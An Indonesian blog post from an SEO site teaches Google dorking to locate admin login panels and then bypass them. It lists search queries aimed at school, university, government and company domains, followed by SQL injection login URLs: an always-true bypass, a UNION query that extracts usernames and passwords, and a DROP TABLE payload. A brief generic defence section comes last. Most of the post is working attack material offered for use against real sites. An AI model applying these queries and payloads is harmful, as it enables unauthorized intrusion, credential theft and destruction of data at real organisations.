Google Dorking: Teknik Profesional untuk Menemukan Admin Panel yang Rentan dan Bypass Proteksi

samuelpasaribu.com
3 Apr, 2025

Google Dorking Bypass Admin Panel Google Dorking, atau yang dikenal juga dengan istilah "Google Hacking", adalah teknik canggih yang memanfaatkan mesin pencari Google untuk menemukan informasi tersembunyi di internet. Teknik ini sering digunakan oleh para hacker dan pentester untuk mencari celah keamanan, termasuk admin panel yang rentan, file sensitif, dan kerentanannya yang dapat dieksploitasi. Dorking memberikan keunggulan karena memanfaatkan kemampuan mesin pencari untuk menemukan data yang mungkin tidak terindeks dengan cara konvensional.

Melalui penggunaan query khusus, para hacker dapat menargetkan halaman login admin atau endpoint yang rentan pada situs web. Dengan memanfaatkan filter seperti URL, jenis file, dan metadata lainnya, Google Dorking memungkinkan pencarian yang sangat terperinci. Artikel ini akan membahas berbagai query Google Dork yang digunakan untuk mencari halaman admin serta cara mengatasi potensi risiko yang ditimbulkan oleh teknik ini.

Penting bagi pengembang dan administrator web untuk memahami potensi risiko yang ditimbulkan oleh Google Dorking, khususnya dalam kaitannya dengan SQL Injection. Di artikel ini, kami juga akan memberikan contoh payload untuk mengeksploitasi kelemahan pada admin panel dan langkah-langkah yang dapat diambil untuk melindungi situs web dari potensi serangan. Pengamanan yang tepat akan sangat membantu dalam mencegah eksploitasi dari teknik-teknik yang semakin berkembang ini.

1. Apa Itu Google Dorking?

Google Dorking adalah teknik yang digunakan oleh hacker untuk memanfaatkan mesin pencari Google dalam menemukan informasi tersembunyi atau tidak aman di situs web. Ini mencakup pencarian admin panel yang rentan dan eksploitasi kerentanannya, seperti SQL Injection. Teknik ini memberi hacker kemampuan untuk menargetkan titik lemah yang tidak terlihat oleh pengguna biasa.

2. Dorks Bypass Admin

Berikut adalah beberapa query Google Dork terbaru yang digunakan untuk mencari halaman admin dan mengeksploitasi kerentanannya:

site:.sch.id inurl:dashboard filetype:php
site:.edu.id inurl:admin filetype:php
intitle:"Login" inurl:admin
inurl:"/admin/login.php"
inurl:"/admin/index.php"
inurl:"/admin/login" ext:php
inurl:"admin" "login" "password"
inurl:admin intitle:"admin panel"
site:.gov inurl:admin filetype:php
site:.ac.id inurl:admin intitle:"Admin Login"
site:.org inurl:"/admin" ext:php
site:.co.id inurl:admin intitle:"Admin Panel"
intitle:"Dashboard" inurl:admin
inurl:"admin" intitle:"login" ext:php
intitle:"Admin Panel" inurl:"/admin" filetype:php

Penjelasan Dorking:

  • site:.sch.id inurl:dashboard filetype:php: Mencari dashboard yang berada di situs dengan domain .sch.id.
  • site:.edu.id inurl:admin filetype:php: Menemukan admin panel di situs berbasis .edu.id.
  • intitle:"Login" inurl:admin: Mencari halaman login admin.
  • inurl:"/admin/login.php": Menargetkan URL langsung menuju halaman login admin.
  • site:.gov inurl:admin filetype:php: Menargetkan situs pemerintah dengan panel admin berbasis PHP.
  • site:.org inurl:"/admin" ext:php: Mencari panel admin pada situs organisasi dengan file PHP.
  • intitle:"Admin Panel" inurl:"/admin" filetype:php: Menemukan halaman admin panel dengan file PHP di dalamnya.

3. Payload untuk Eksploitasi Admin Panel

Berikut adalah contoh payload SQL Injection yang digunakan untuk mengeksploitasi panel admin yang rentan:

https://example.com/admin/login.php?username=admin&password=' OR 1=1 -- 
https://example.com/admin/login.php?username=admin&password=' UNION SELECT null, username, password FROM users -- 
https://example.com/admin/login.php?username=admin&password='; DROP TABLE users -- 
https://example.com/admin/login.php?username=admin&password=' OR 'a'='a' -- 
https://example.com/admin/login.php?username=admin&password=';--

Penjelasan Payload:

  • ' OR 1=1 --: Teknik SQL Injection klasik untuk bypass login.
  • ' UNION SELECT null, username, password FROM users --: Menggunakan UNION untuk mendapatkan data kredensial pengguna.
  • '; DROP TABLE users --: Menghapus tabel pengguna sebagai aksi perusakan.
  • ' OR 'a'='a' --: Teknik bypass otentikasi menggunakan perbandingan yang selalu benar.
  • ';--: Teknik SQL untuk menutup perintah SQL yang tidak valid dan melewati otentikasi.

4. Perlindungan Terhadap Google Dorking dan SQL Injection

Untuk melindungi situs web Anda dari teknik ini, berikut adalah langkah-langkah yang dapat dilakukan:

  • Gunakan WAF: Firewall aplikasi web membantu menyaring serangan Dorking dan SQL Injection.
  • Validasi Input: Pastikan bahwa input pengguna disanitasi dengan benar untuk mencegah injeksi SQL.
  • Gunakan HTTPS: Enkripsi data untuk menghindari pencurian data pengguna dan kredensial login.
  • Gunakan 2FA: Otentikasi dua faktor menambah lapisan perlindungan untuk panel admin dan login pengguna.
  • Audit Keamanan Rutin: Lakukan audit rutin untuk memeriksa potensi kerentanannya dan melakukan pembaruan yang diperlukan.

Baca juga : SQL Injection 2025: Teknik Eksploitasi Parameter untuk Dumping Database dan Kredensial

5. Kesimpulan

Google Dorking adalah teknik yang kuat untuk menemukan admin panel yang rentan dan mengeksploitasi kelemahan di situs web. Namun, penting bagi pengembang dan administrator untuk menjaga situs mereka dengan melakukan audit rutin, validasi input, dan menggunakan alat pengamanan yang tepat. Pengamanan yang tepat adalah langkah pertama dalam mencegah serangan yang semakin canggih ini.

samuelpasaribu.com

samuelpasaribu.com

samuelpasaribu.com working in the Search Engine Optimization field since 2019. And worked on many successful projects since then. He shares the real-life experience of best SEO practices with his followers on samuelpasaribu.com. You also can learn Advance level SEO for WordPress, Blogger, or any other blogging platform. Stay tuned.

Previous Post
No Comment
Add Comment
comment url